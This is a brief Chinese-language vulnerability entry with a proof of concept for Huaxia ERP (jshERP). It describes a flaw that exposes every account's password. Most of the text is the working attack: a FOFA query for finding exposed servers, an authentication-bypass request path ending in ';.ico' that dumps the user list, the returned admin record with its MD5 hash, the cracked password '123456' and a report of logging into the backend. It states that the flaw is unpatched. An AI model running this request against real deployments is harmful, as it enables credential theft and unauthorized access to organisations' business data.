描述
华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。
华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。
目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议。
fofa语法:"jshERP-boot"
POC
/jshERP-boot/user/getAllList;.ico
{
"id": 120,
"username": "管理员",
"loginName": "admin",
"password": "e10adc3949ba59abbe56e057f20f883e",
"position": null,
"department": null,
"email": null,
"phonenum": null,
"ismanager": 1,
"isystem": 0,
"status": 0,
"description": null,
"remark": null,
"tenantId": 0
},获取到admin账号md5加密后的值
(admin只是平台运维用户,真正的管理员是租户(测试账号为jsh),admin不能编辑任何业务数据,只能配置平台菜单和创建租户)
解密后获得密码:123456
成功登录后台
